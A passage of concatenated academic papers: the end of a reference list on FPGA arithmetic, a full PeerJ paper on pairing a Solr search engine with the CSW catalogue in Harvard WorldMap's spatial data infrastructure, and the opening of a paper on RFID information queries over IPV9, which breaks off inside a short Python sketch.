[5] Qasem Abu Al-Haija, Sharifah M. S. Ahmad, "Fast Radix-2 Sequential Multiplier Using Kintex-7 FPGA Chip Family", The Open Cybernetics & Systemics Journal, Bentham Open, Vol. 12, 2018.
[6] Mohammed Mosab Asad, Ibrahim Marouf, Qasem Abu Al-Haija, "Review Of Fast Multiplication Algorithms For Embedded Systems Design", International Journal Of Scientific & Technology Research, Volume 6, Issue 08, 2017.
[7] Heath, Steve (2003). Embedded systems design. EDN series for design engineers (2 ed.). Newnes. p. 2. ISBN 978-0-7506-5546-0. An embedded system is a microprocessor based system that is built to control a function or a range of functions.
[8] I. Marouf, M. M. Asad, A. Bakhuraibah and Q. A. Al-Haija, "Cost analysis study of variable parallel prefix adders using Altera Cyclone IV FPGA kit," 2017 International Conference on Electrical and Computing Technologies and Applications (ICECTA), Ras Al Khaimah, 2017, pp. 1-4. doi: 10.1109/ICECTA.2017.8252011
[9] Altera Co., "Introduction to Quartus II Software: Ver 10.0", Intel Quartus II MNL-01055-1.0, 2012.
[10] Altera Corporation, "Cyclone IV Device Handbook", Vol. 1, CYIV-5V1-2.2, https://www.altera.com/, 2012.
[11] S. Butchibabu, S. Kishore Bab (2014). Design and Implementation of Efficient Parallel Prefix Adders on FPGA, International Journal of Engineering Research & Technology, Vol. 3, Issue No. 7.
[12] B. Parhami, (1999), "Computer Arithmetic: Algorithms and Hardware Designs", Oxford University Press, Oxford.
[13] D. Purohit, H. Joshi, (2014), 'Comparative Study and Analysis of Fast Multipliers', International Journal of Engineering and Technical Research (IJETR), Vol. 2, No. 7, 2014.
[14] A. Karatsuba and Y. Ofman, (1963) 'Multiplication of Multidigit Numbers on Automata', Soviet Physics, Doklady, pp. 595-596.
https://www.researchgate.net/publication/234346907_Multiplication_ of_Multidigit_Numbers_on_Automata [15] Qasem Abu Al-Haija, Mohamad M.Asad, Ibrahim Marouf,"A Systematic Expository Review of Schmidt-Samoa Cryptosystem", International Journal of Mathematical Sciences and Computing(IJMSC), Vol.4, No.2, pp.12-21, 2018.DOI: 10.5815/ijmsc.2018.02.02 [16] Qasem Abu Al-Haija, Mahmoud Smadi, Monther Al-Ja’fari, Abdullah Al-Shua’ibi, "Efficient FPGA implementation of RSA coprocessor using scalable modules", Procedia Computer Science, Elsevier, Vol 34, 2014. [17] Qasem Abu Al-Haija, Mohammad Alkhatib, Azmi B Jaafar, "Choices on Designing GF(P) Elliptic Curve Coprocessor Benefiting from Mapping Homogeneous Curves in Parallel Multiplications", International Journal on Computer Science and Engineering, Engg Journals Publications, Vol. 3, No. 2, 2011. work_2ha3mubt3zcffhnqhokzofd3ai ---- Enhancing discovery in spatial data infrastructures using a search engine Enhancing discovery in spatial data infrastructures using a search engine Paolo Corti1, Athanasios Tom Kralidis2 and Benjamin Lewis1 1 Center for Geographic Analysis, Harvard University, Cambridge, MA, USA 2 Open Source Geospatial Foundation, Beaverton, OR, USA ABSTRACT A spatial data infrastructure (SDI) is a framework of geospatial data, metadata, users and tools intended to provide an efficient and flexible way to use spatial information. One of the key software components of an SDI is the catalogue service which is needed to discover, query and manage the metadata. Catalogue services in an SDI are typically based on the Open Geospatial Consortium (OGC) Catalogue Service for the Web (CSW) standard which defines common interfaces for accessing the metadata information. A search engine is a software system capable of supporting fast and reliable search, which may use ‘any means necessary’ to get users to the resources they need quickly and efficiently. These techniques may include full text search, natural language processing, weighted results, fuzzy tolerance results, faceting, hit highlighting, recommendations and many others. In this paper we present an example of a search engine being added to an SDI to improve search against large collections of geospatial datasets. The Centre for Geographic Analysis (CGA) at Harvard University re-engineered the search component of its public domain SDI (Harvard WorldMap) which is based on the GeoNode platform. A search engine was added to the SDI stack to enhance the CSW catalogue discovery abilities. It is now possible to discover spatial datasets from metadata by using the standard search operations of the catalogue and to take advantage of the new abilities of the search engine, to return relevant and reliable content to SDI users. Subjects Human-Computer Interaction, Spatial and Geographic Information Systems Keywords Data discovery, Catalogue Service for the Web, Metadata, WorldMap, Geoportal, Search engine, Spatial Data Infrastructure, pycsw, Solr, GeoNode INTRODUCTION A spatial data infrastructure (SDI) typically stores a large collection of metadata. While the Open Geospatial Consortium (OGC) recommends the use of the catalogue service for the web (CSW) standard to query these metadata, several important benefits can be obtained by pairing the CSW with a search engine platform within the SDI software stack. SDI, interoperability, and standards An SDI is a framework of geospatial data, metadata, users and tools which provides a mechanism for publishing and updating geospatial information. 
An SDI provides the architectural underpinnings for the discovery, evaluation and use of geospatial information (Nebert, 2004; Goodchild, Fu & Rich, 2007; Masó, Pons & Zabala, 2012). SDIs are typically distributed in nature, and connected by disparate computing platforms and client/server design patterns. A critical principle of an SDI is interoperability, which can be defined as the ability of a system or of components in a system to provide information sharing and inter-application cooperative process control through a mutual understanding of request and response mechanisms embodied in standards. Standards (formal, de facto, community) provide three primary benefits for geospatial information: (a) portability: use and reuse of information and applications, (b) interoperability: multiple system information exchange and (c) maintainability: long term updating and effective use of a resource (Groot & McLaughlin, 2000). The OGC standards baseline has traditionally provided core standards definitions to major SDI activities. Along with other standards bodies (IETF, ISO, OASIS) and de facto/community efforts (Open Source Geospatial Foundation (OSGeo), etc.), OGC standards provide broadly accepted, mature specifications, profiles and best practices (Kralidis, 2009).
Metadata search in an SDI and CSW
An SDI can contain a large number of geospatial datasets which may grow in number over time. The difficulty of finding a needle in such a haystack means a more effective metadata search mechanism is called for. Metadata is data about data: it describes the content, quality, condition and other characteristics of data in order to ease the search for and understanding of data (Nogueras-Iso, Zarazaga-Soria & Muro-Medrano, 2005). Metadata standards define a way to provide homogeneous information about the identification, the extent, the spatial and temporal aspects, the content, the spatial reference, the portrayal, distribution and other properties of digital geographic data and services (ISO 19115-1: 2014, 2014). Ease of data discovery is a critical measure of the effectiveness of an SDI. The OGC CSW standard specifies the interfaces and bindings, as well as a framework for defining the application profiles, required to publish and access digital catalogues of metadata for geospatial data and services (Open Geospatial Consortium, 2016; Nebert, Whiteside & Vretanos, 2005; Rajabifard, Kalantari & Binns, 2009). Based on the Dublin Core metadata information model, CSW supports broad interoperability around discovering geospatial data and services spatially, non-spatially, temporally, and via keywords or free text.
CSW supports application profiles which allow information communities to constrain and/or extend the CSW specification to satisfy specific discovery requirements and to realize tighter coupling and integration of geospatial data and services. The CSW ISO Application Profile is an example of a standard for geospatial data search which follows the ISO geospatial metadata standards.
CSW catalogue within the SDI architecture
In a typical SDI architecture the following components can be identified:
- GIS clients: desktop GIS tools or web based viewers.
- Spatial data server: returns geospatial data to map clients in a range of formats.
- Cache data server: returns cached tiles to map clients to improve performance.
- Processing server: responsible for the processing of the geospatial datasets.
- Spatial repository: a combination of a spatial database and file system, where the geospatial data is stored.
- Catalogue server: used by map clients to query the metadata of the spatial datasets to support discovery.
Desktop GIS clients generally access the SDI data directly from the spatial repository or the file system. When the user has appropriate permissions, it is possible from these clients to perform advanced operations, which are generally faster than when performed over OGC web standards. Web based viewers access the SDI data served by the spatial data server using a number of OGC web standards over HTTP, typically WMS/WMTS/WMS-C when the data only needs to be rendered, or WFS/WCS when access to the native information is needed, for vector or coverage datasets respectively. WFS-T can be used for editing vector datasets. Web viewers can run GIS SDI processes by using the WPS standard exposed by the processing server. All of these OGC standards can be used by desktop GIS clients as well. The spatial repository is generally a combination of an RDBMS with a spatial extension and the file system where data not held in the database are stored. The catalogue, based on the CSW standard, lets users discover data and services in an SDI. CSW is a standard for exposing a catalogue of geospatial entities over the HTTP request/response cycle. In an SDI or portal, CSW endpoints are provided by a CSW catalogue. Popular open source implementations of CSW catalogues include (but are not limited to) pycsw (http://pycsw.org/), GeoNetwork (https://geonetwork-opensource.org/), deegree (https://www.deegree.org/) and Esri Geoportal Server (https://www.esri.com/en-us/arcgis/products/geoportal-server/overview). A CSW catalogue implements a number of operations which are accessible via HTTP. Some of these operations are optional:
- GetCapabilities retrieves service metadata from the server.
- DescribeRecord allows a client to discover the data model of a specific catalogue information model.
- GetRecords searches for records using a series of criteria, which can be spatial, aspatial, logical or comparative.
- GetRecordById retrieves metadata for one record (layer) of the catalogue by its id.
- GetDomain (optional) retrieves runtime information about the range of values of a metadata record element or request parameter.
- Harvest (optional) creates or updates metadata with a request to the server to 'pull' metadata from some endpoint.
- Transaction (optional) creates or edits metadata with a request to the server.
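As an illustration of how a client exercises these operations, the short Python sketch below uses the OWSLib client library to send a GetRecords request with a full-text constraint to a CSW endpoint. The endpoint URL and the search term are placeholders, and error handling is omitted; this is a minimal sketch rather than part of the architecture described in this paper.

```python
from owslib.csw import CatalogueServiceWeb
from owslib.fes import PropertyIsLike

# hypothetical CSW endpoint (e.g. a pycsw instance); replace with a real catalogue URL
csw = CatalogueServiceWeb('https://example.org/csw')

# full-text constraint on the csw:AnyText queryable
query = PropertyIsLike('csw:AnyText', '%landuse%')
csw.getrecords2(constraints=[query], maxrecords=10, esn='summary')

# print the identifiers and titles of the matching metadata records
for rec_id, rec in csw.records.items():
    print(rec_id, rec.title)
```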
Need for a search engine within an SDI Search workflow and user experience are a vital part of modern web-based applications. Numerous types of web application, such as Content Management Systems (CMS), wikis, data delivery frameworks, all can benefit from improved data discovery. Same applies Corti et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.152 3/15 http://pycsw.org/ https://geonetwork-opensource.org/ https://www.deegree.org/ https://www.esri.com/en-us/arcgis/products/geoportal-server/overview https://www.esri.com/en-us/arcgis/products/geoportal-server/overview http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ to SDI. Furthermore, in the Big Data era, more powerful mechanisms are needed to return relevant content to the users from very large collections of data (Tsinaraki & Schade, 2016). In the last few years, content-driven platforms have delegated the task of search optimization to specific frameworks known as search engines. Rather than implementing a custom search logic, these platforms now often add a search engine in the stack to improve search. Apache Solr (http://lucene.apache.org/solr/) and Elasticsearch (https:// www.elastic.co/), two popular open source search engine web platforms, both based on Apache Lucene (https://lucene.apache.org/), are commonly used in typical web application stacks to support complex search criteria, faceting, results highlighting, query spell-check, relevance tuning and more (Smiley et al., 2015). As for CMS’s, SDI search can dramatically benefit from such platforms as well. How a search engine works Typically the way a search engine works can be split into two distinct phases: indexing and searching. During the indexing phase, all of the documents (metadata, in the SDI context) that must be searched are scanned, and a list of search terms (an index) is built. For each search term, the index keeps track of the identifiers of the documents that contain the search term. During the searching phase only the index is looked at, and a list of the documents containing the given search term is quickly returned to the client. This indexed approach makes a search engine extremely fast in outputting results. On top of this, a search engine provides many other useful search related features, improving dramatically the experience of users. Improvements in an SDI with a search engine There are numerous opportunities to enhance the functionality of the CSW specification and subsequent server implementations by specifying standard search engine functionality as enhancements to the standard. A search engine is extremely fast and scalable: by building and maintaining its indexed structure of the content, it can return results much faster and scale much better than a traditional CSW based on a relational database. While a CSW can search metadata with a full text approach, with a search engine it is possible to extend the full text search with features such as language stemming, thesaurus and synonyms, hit highlighting, wild-card matches and other ‘fuzzy’ matching techniques. Another key advantage is that search engines can provide relevancy scores for likely matches, allowing for much finer tuning of search results. CSW does not easily emit facets or facet counts as part of search results. Search engine facets however, can be based on numerous classification schemes, such as named geography, date and time extent, keywords, etc. 
and can be used to enable interactive feedback mechanisms which help users define and refine their searches effectively. BACKGROUND Harvard WorldMap (http://worldmap.harvard.edu/) is an open source SDI and Geospatial Content Management System (GeoCMS) platform developed by the Centre for Geographic Analysis (CGA) to lower the barrier for scholars who wish to explore, visualize, edit and publish geospatial information (Guan et al., 2012). Registered users are Corti et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.152 4/15 http://lucene.apache.org/solr/ https://www.elastic.co/ https://www.elastic.co/ https://lucene.apache.org/ http://worldmap.harvard.edu/ http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ able to upload geospatial content, in the form of vector or raster datasets (layers), and combine them with existing layers to create maps. Existing layers can be layers uploaded by other users and layers provided by external map services. WorldMap is a web application built on top of the GeoNode open source mapping platform (http://geonode.org/), and since 2010 has been used by more than 20,000 registered users to upload about 30,000 layers and to create some 5,000 web maps. Users can also access about 90,000 layers from remote map services based on OGC standards and Esri REST protocols. WorldMap is based on the following components, all open source and designed around OGC standards (Fig. 1): � A JavaScript web GIS client, GeoExplorer (http://suite.boundlessgeo.com/docs/latest/), based on OpenLayers (https://openlayers.org/) and ExtJS (https://www.sencha.com/ products/extjs/). Figure 1 The WorldMap SDI architecture. Full-size DOI: 10.7717/peerj-cs.152/fig-1 Corti et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.152 5/15 http://geonode.org/ http://suite.boundlessgeo.com/docs/latest/ https://openlayers.org/ https://www.sencha.com/products/extjs/ https://www.sencha.com/products/extjs/ http://dx.doi.org/10.7717/peerj-cs.152/fig-1 http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ � A spatial data server based on GeoServer (http://geoserver.org/). � A cache data server based on GeoWebCache (http://geowebcache.org/). � A spatial database implemented with PostgreSQL (https://www.postgresql.org/) and PostGIS (https://postgis.net/). � A catalogue based on pycsw or GeoNetwork. � Aweb application, developed with Django (https://www.djangoproject.com/), a Python web framework, which orchestrates all of the previous components. WorldMap allows users to build maps using its internal catalogue of layers (local layers) combined with layers from external map services (remote layers), for a total of about 120,000 layers. WorldMap users can have trouble finding useful and reliable layers given the large number of them; a system was needed to enable fast, scalable search capable of returning the most reliable and useful layers within a large and heterogeneous collection. RESULTS AND DISCUSSION In 2015 CGA started the design and development of Hypermap Registry (Hypermap) (https://github.com/cga-harvard/Hypermap-Registry) to improve search for WorldMap users. Hypermap is an application that manages OGC web services (such as WMS, WMTS, CSW Capabilities service metadata) as well as Esri RESTendpoints. In addition it supports map service discovery (Chen et al., 2011), crawling (Bone et al., 2016; Li, Yang & Yang, 2010), harvesting and uptime statistics gathering for services and layers. 
One of the main purposes of Hypermap is to bring enhanced search engine capabilities into an SDI architecture. As it can be seen from the following Fig. 2, search engine documents, based on a provided schema, must be kept in synchrony with layer metadata stored in the GeoNode RDBMS. Hypermap is responsible for ensuring that the WorldMap search engine, based on Apache Solr, and the WorldMap catalogue RDBMS, based on PostgreSQL, are kept in sync. For example, when a WorldMap user updates the metadata information for one layer from the WorldMap metadata editing interface, that information is updated in the WorldMap pycsw backend, which is based on the RDBMS. As soon as this happens, a synchronization task is sent from Hypermap to the task queue. The task will be processed by the task queue, and all of the metadata information for the layer will be synced to the corresponding search engine document. Thanks to this synchronization mechanism, WorldMap users can search the existing layers metadata using a search engine rather than the OGC catalogue, enabling more flexible searches which filter on keywords, source, layer type, map extent and date range (Corti & Lewis, 2017). The results are returned by the search engine which returns a JSON response, and tabular in addition to spatial views (based on spatial facets) are returned to the browser (Fig. 2). WorldMap improvements with the search engine By pairing the CSW catalogue with a search engine, the metadata search in the WorldMap SDI yields several major benefits. Corti et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.152 6/15 http://geoserver.org/ http://geowebcache.org/ https://www.postgresql.org/ https://postgis.net/ https://www.djangoproject.com/ https://github.com/cga-harvard/Hypermap-Registry http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ Fast results By having the metadata content indexed in a search engine, metadata are returned very rapidly to the client. Because of its indexed documents nature, a search engine is much faster to return results when compared it with a relational database. Therefore, using a search engine in WorldMap search client makes things much faster than using a CSW catalogue based on a RDBMS. Scalability From a software engineering perspective, search engines are highly scalable and replicable, thanks to their shardable architecture. Such systems are capable of providing interactive query access to collections of spatio-temporal objects containing billions of features (Kakkar & Lewis, 2017; Kakkar et al., 2017). Clean API Query to the search engine API tends to be much simpler than XML queries to the CSW catalogue, specially when crafting advanced search requests (spatial, non-spatial, temporal, etc.). Same for output: JSON output from search engine API provides a more compact representation of search results enabling better performance and making the output more readable (Figs. 3 and 4). Figure 2 Metadata RDBMS to search engine synchronization in Harvard WorldMap. Full-size DOI: 10.7717/peerj-cs.152/fig-2 Corti et al. (2018), PeerJ Comput. 
Sci., DOI 10.7717/peerj-cs.152 7/15 http://dx.doi.org/10.7717/peerj-cs.152/fig-2 http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ Synonyms, text stemming Crucially, search engines are good at handling the ambiguities of natural languages, thanks to stop words (words filtered out during the processing of text), stemming (ability to detect words derived from a common root), synonyms detection and controlled vocabularies such as thesauri and taxonomies. It is possible to do phrase searches and proximity searches (search for a phrase containing two different words separated by a specified number of words). Because of features like these, keyword queries using the Hypermap search engine endpoint typically returns more results than an equivalent Figure 3 CSW request and response. Full-size DOI: 10.7717/peerj-cs.152/fig-3 Corti et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.152 8/15 http://dx.doi.org/10.7717/peerj-cs.152/fig-3 http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ Figure 4 Search engine request and response. Full-size DOI: 10.7717/peerj-cs.152/fig-4 Corti et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.152 9/15 http://dx.doi.org/10.7717/peerj-cs.152/fig-4 http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ query using the Hypermap CSW. For example doing a full text search for the keyword ‘library’ returns more results from the search engine because it includes variations and synonyms of the original term like ‘libraries,’ ‘bibliotheca,’ ‘repository,’ ‘repositories’ in the returned results. Figure 5 Facets generate counts for metadata categories and geographic regions in a GeoCMS. Full-size DOI: 10.7717/peerj-cs.152/fig-5 Corti et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.152 10/15 http://dx.doi.org/10.7717/peerj-cs.152/fig-5 http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ Relevancy Results can be ranked, providing a way to return results to users with the more relevant ones closer to the top. This is very useful to detect the most significative metadata for a given query. Weights can be assigned by specifying boosts (weighted factors) for each field. Facets Another important search engine feature useful for searching the WorldMap metadata catalogue is faceted search. Faceting is the arrangement of search results in categories based on indexed terms. This capability makes it possible, for example to provide an immediate indication of the number of times that common keywords are contained in different metadata documents. A typical use case is with metadata categories, keywords and regions. Thanks to facets, the user interface of an SDI catalogue can display counts for documents by category, keyword or region (Fig. 5). Search engines can also support temporal and spatial faceting, two features that are extremely useful for browsing large collections of geospatial metadata. Temporal faceting can display the number of metadata documents by date range as a kind of histogram. Spatial faceting can provide a spatial surface representing the distribution of layers or features across an area of interest. In Fig. 6, a heatmap is generated by spatial faceting which shows the distribution of layers in the WorldMap SDI for a given geographic region (Fig. 6). Figure 6 Spatial faceting enables heatmaps showing the distribution of the SDI layers in the space. Full-size DOI: 10.7717/peerj-cs.152/fig-6 Corti et al. (2018), PeerJ Comput. 
Sci., DOI 10.7717/peerj-cs.152 11/15 http://dx.doi.org/10.7717/peerj-cs.152/fig-6 http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ Other features In addition, it is possible to use regular expressions, wildcard search and fuzzy search to provide results for a given term and its common variations. It is also possible to support boolean queries: a user is able to search results using terms and boolean operators such as AND, OR, NOT and hit highlighting can provide immediate search term suggestions to the user searching a text string in metadata. CONCLUSION While the CSW 3.0.0 standard provides improvements to address mass market search/ discovery, the benefits of search engine implementations combined with broad interoperability of the CSW standard presents a great opportunity to enhance the CSW Figure 7 pycsw interaction with the search engine using an application profile and using a basic profile (when pycsw will provide direct support for the search engine). Full-size DOI: 10.7717/peerj-cs.152/fig-7 Corti et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.152 12/15 http://dx.doi.org/10.7717/peerj-cs.152/fig-7 http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ standard. The authors hope that such an approach eventually becomes formalized as a CSW Application Profile or Best Practice in order to achieve maximum benefit and adoption in SDI activities. This will allow CSW implementations to make better use of search engine methodologies for improving the user search experience in SDI workflows. In addition, pycsw is planning for dedicated Elasticsearch/Solr support as part of a future release to enable the use of search engines as backend stores to the CSW standard. This is a different approach from using an Application Profile or Best Practice, as it directly interacts with data in the search engine rather than in the RDBMS (Fig. 7). The authors would like to share this work with the OGC CSW community in support of the evolution of the CSW specification. Given recent developments on the OGC WFS 3.0 standard (RESTful design patterns, JSON, etc.), there is an opportunity for CSW to evolve in alignment with WFS 3.0 in support of the principles of the W3C Spatial Data on the Web Best Practices (Group, 2017) in a manner similar to the work presented in this paper. ACKNOWLEDGEMENTS The authors thank all the contributors to the Hypermap and GeoNode platform source code, particularly: Wayner Barrios, Matt Bertrand, Simone Dalmasso, Alessio Fabiani, Jorge Martı́nez Gómez, Wendy Guan, Jeffrey Johnson, Devika Kakkar, Jude Mwenda, Ariel Núñez, Luis Pallares, David Smiley, Charles Thao, Angelos Tzotsos, Mingda Zhang. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work is partially funded by the U.S. National Endowment for the Humanities, Digital Humanities Implementation Grant #HK5009113 and the U.S. National Science Foundation Industry-University Cooperative Research Centers Program (IUCRC) grant for the Spatiotemporal Thinking, Computing, and Applications Center (STC) #1338914, and by Harvard University. Grant administration was supported by Harvard’s Institute for Quantitative Social Science. There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: U.S. 
National Endowment for the Humanities, Digital Humanities Implementation: #HK5009113. U.S. National Science Foundation Industry-University Cooperative Research Centers Program (IUCRC). Spatiotemporal Thinking, Computing, and Applications Center (STC): #1338914. Harvard University. Harvard’s Institute for Quantitative Social Science. Corti et al. (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.152 13/15 http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ Competing Interests The authors declare that they have no competing interests. Author Contributions � Paolo Corti conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Athanasios Tom Kralidis performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Benjamin Lewis performed the experiments, analyzed the data, contributed reagents/ materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: Hypermap Registry: https://github.com/cga-harvard/Hypermap-Registry REFERENCES Bone C, Ager A, Bunzel K, Tierney L. 2016. A geospatial search engine for discovering multi- format geospatial data across the web. International Journal of Digital Earth 9(1):47–62 DOI 10.1080/17538947.2014.966164. Chen N, Chen Z, Hu C, Di L. 2011. A capability matching and ontology reasoning method for high precision OGC web service discovery. International Journal of Digital Earth 4(6):449–470 DOI 10.1080/17538947.2011.553688. Corti P, Lewis B. 2017. Making temporal search more central in spatial data infrastructures. In: ISPRS Annals of Photogrammetry, Remote Sensing and Spatial Information Sciences. Germany: Copernicus Publications, 93–95. Goodchild MF, Fu P, Rich P. 2007. Sharing geographic information: an assessment of the geospatial one-stop. Annals of the Association of American Geographers 97(2):250–266 DOI 10.1111/j.1467-8306.2007.00534.x. Groot R, McLaughlin JD. 2000. Geospatial Data Infrastructure: Concepts, Cases, and Good Practice. Oxford: Oxford University Press. Group OWW. 2017. Spatial data on the web best practices. Available at https://www.w3.org/TR/ sdw-bp/ (accessed 12 March 2018). Guan WW, Bol PK, Lewis BG, Bertrand M, Berman ML, Blossom JC. 2012. Worldmap—a geospatial framework for collaborative research. Annals of GIS 18(2):121–134 DOI 10.1080/19475683.2012.668559. ISO 19115-1: 2014. 2014. Geographic Information—Metadata—Part 1: Fundamentals. Geneva: International Standards Organisation. Kakkar D, Lewis B. 2017. Building a billion spatio-temporal object search and visualization platform. In: ISPRS Annals of Photogrammetry, Remote Sensing and Spatial Information Sciences. Germany: Copernicus Publications, 97–100. Corti et al. (2018), PeerJ Comput. 
Sci., DOI 10.7717/peerj-cs.152 14/15 https://github.com/cga-harvard/Hypermap-Registry http://dx.doi.org/10.1080/17538947.2014.966164 http://dx.doi.org/10.1080/17538947.2011.553688 http://dx.doi.org/10.1111/j.1467-8306.2007.00534.x https://www.w3.org/TR/sdw-bp/ https://www.w3.org/TR/sdw-bp/ http://dx.doi.org/10.1080/19475683.2012.668559 http://dx.doi.org/10.7717/peerj-cs.152 https://peerj.com/computer-science/ Kakkar D, Lewis B, Smiley D, Nunez A. 2017. The billion object platform (bop): a system to lower barriers to support big, streaming, spatio-temporal data sources. Free and Open Source Software for Geospatial (FOSS4G) Conference Proceedings 17:15 DOI 10.7275/R5ST7N0G. Kralidis AT. 2009. Geospatial web services: the evolution of geospatial data infrastructure. In: The Geospatial Web. London: Springer, 223–228. Li W, Yang C, Yang C. 2010. An active crawler for discovering geospatial web services and their distribution pattern—a case study of OGC web map service. International Journal of Geographical Information Science 24(8):1127–1147 DOI 10.1080/13658810903514172. Masó J, Pons X, Zabala A. 2012. Tuning the second-generation SDI: theoretical aspects and real use cases. International Journal of Geographical Information Science 26(6):983–1014 DOI 10.1080/13658816.2011.620570. Nebert DD. 2004. Developing Spatial Data Infrastructures: the SDI cookbook. Global Spatial Data Infrastructure (GSDI) Association. Available at http://gsdiassociation.org/images/publications/ cookbooks/SDI_Cookbook_GSDI_2004_ver2.pdf. Nebert D, Whiteside A, Vretanos P. 2005. OGC catalogue services specification. Open Geospatial Consortium Inc. Available at https://portal.opengeospatial.org/files/?artifact_id=20555. Nogueras-Iso J, Zarazaga-Soria FJ, Muro-Medrano PR. 2005. Geographic Information Metadata for Spatial Data Infrastructures: Resources, Interoperability and Information Retrieval. Berlin, Heidelberg: Springer Berlin Heidelberg. Open Geospatial Consortium. 2016. Catalogue service. Available at http://www.opengeospatial. org/standards/cat/ (accessed 12 March 2018). Rajabifard A, Kalantari M, Binns A. 2009. SDI and metadata entry and updating tools. In: SDI Convergence. Available at https://minerva-access.unimelb.edu.au/bitstream/handle/ 11343/26084/115448_SDIandMetadataEntryandUpdatingtool.pdf. Smiley D, Pugh E, Parisa K, Mitchell M. 2015. Apache Solr Enterprise Search Server. Birmingham: Packt Publishing Ltd. Tsinaraki C, Schade S. 2016. Big data—a step change for SDI? International Journal 11:9–19. Corti et al. (2018), PeerJ Comput. 
work_2iy7olcp6bgspd4hfeinespmbm ---- None work_2lytvedz4zhc3ne5onhq7issre ----
International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 DOI: 10.21307/ijanmc-2019-074 74
On the RFID Information Query Technology Based on IPV9
Li Guiping, The School of Computer Science and Engineering, Xi'an Technological University, Xi'an, China, E-mail: 15693685@qq.com
Xue Lei, Shandong University of Science and Technology, 223 Daizong Street, Tai'an City, Shandong Province, 271000, E-mail: Shirleyxue06@163.com
Abstract—Since the coding format of RF labels is inconsistent with the protocol format of the information server's network, a design scheme for a network architecture is proposed to achieve connectivity between the decimal network based on IPV9 and the Internet based on IPV4/IPV6. In addition, two ways of querying information and achieving connectivity, based on D-ONS and on direct routing within the decimal network, are devised by using expert modules.
The experimental results show that both approaches can provide an efficient RFID information query service.

Keywords-IPV9; RFID; Domain Transformation; Information Query

I. INTRODUCTION
With the development of radio frequency technology, product-related information can be obtained quickly by readers if RF tags are assigned to each product. Recently, people have begun to adopt the IPV6 and even IPV9 protocol formats for RF tag coding, since the IPV4 address space has been exhausted. If the server storing the product-related information sits in an IPV4 or IPV6 network, the problem of querying RF information across networks has to be solved. This paper studies the RF information query process for interconnecting the decimal network with the Internet, and the domain name conversion rules obtained by the decimal network query server.

II. IPV9
IPV9, short for the decimal network and the new generation of Internet, is the result of China's independent innovation in core technologies: the IPV9 protocol, IPV9 addressing, the digital domain name system and other core technologies are adopted with original and independent intellectual property rights. Fully digital text is used to represent the IP address, and the address space is larger than that of IPV4 or IPV6. The 1st to 41st levels of the address space are expressed as binary 256 bits, while the 42nd level is expressed as decimal 256 bits.

III. RFID
Radio Frequency Identification (RFID) is a non-contact automatic identification technology. It communicates with other objects using reflected power. It can automatically identify target objects and obtain relevant data through radio frequency signals, which makes it possible to track items and exchange data quickly, and the identification requires no human participation. A typical RFID system consists of an electronic tag, a reader (including an antenna) and an application system. Electronic tags are the data carrier of an RFID system; each consists of a label antenna and a label chip. A tag can receive the reader's electromagnetic field modulation signal and return a response signal, so that the label identification code and memory data can be read or written. The reader is used to receive host commands and send the data stored in the tag back to the host in a wired or wireless way. It contains a controller and an antenna; if the reading distance is long, the antenna stands alone. The terminal computer of the application system interacting with the RFID system transmits the work instructions issued by the MIS application system. It coordinates the electronic tags and readers through middleware, processes all data collected by the RFID system, and carries out calculation, storage and data transmission. The process can be described as in Fig. 1 and Fig. 2.

Figure 1. The query process of information based on RFID (RFID reader/writer, RFID antenna, RFID electronic tag and the computer control network exchanging timing, data and energy).

Figure 2. Electronic tags.

The operating principle of an RFID system is that, when an item with an electronic tag enters the radiation range of the reader antenna, the tag receives the radio frequency signal emitted by the reader. A passive tag sends the data stored in the tag chip using the energy generated by the induced current, while an active electronic tag can send the data stored in the tag chip actively. Generally, readers are equipped with middleware that can read the data, decode it, carry out simple data processing directly, and then send the result to the application system.
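To make this read-decode-forward role of the reader middleware concrete, the following minimal Python sketch models a tag read event and a middleware layer that drops duplicate reads before forwarding them to the application system. The event fields, class names and the de-duplication step are illustrative assumptions, not part of any RFID standard or of the architecture described in this paper.

# Illustrative sketch only: a reader middleware that forwards de-duplicated
# tag reads to the application system, as described in Section III.
from dataclasses import dataclass
import time

@dataclass
class TagRead:
    tag_id: str        # identifier stored in the tag chip (e.g., an IPV9-coded identifier)
    reader_id: str     # which reader/antenna produced the read
    timestamp: float   # time of the read event

class ReaderMiddleware:
    """Hypothetical middleware: filters duplicate reads and forwards the rest."""

    def __init__(self, dedup_window_s: float = 2.0):
        self.dedup_window_s = dedup_window_s
        self._last_seen = {}  # tag_id -> timestamp of the last forwarded read

    def on_read(self, read: TagRead, forward):
        """Forward a read unless the same tag was forwarded very recently."""
        last = self._last_seen.get(read.tag_id)
        if last is not None and read.timestamp - last < self.dedup_window_s:
            return  # duplicate read within the window; drop it
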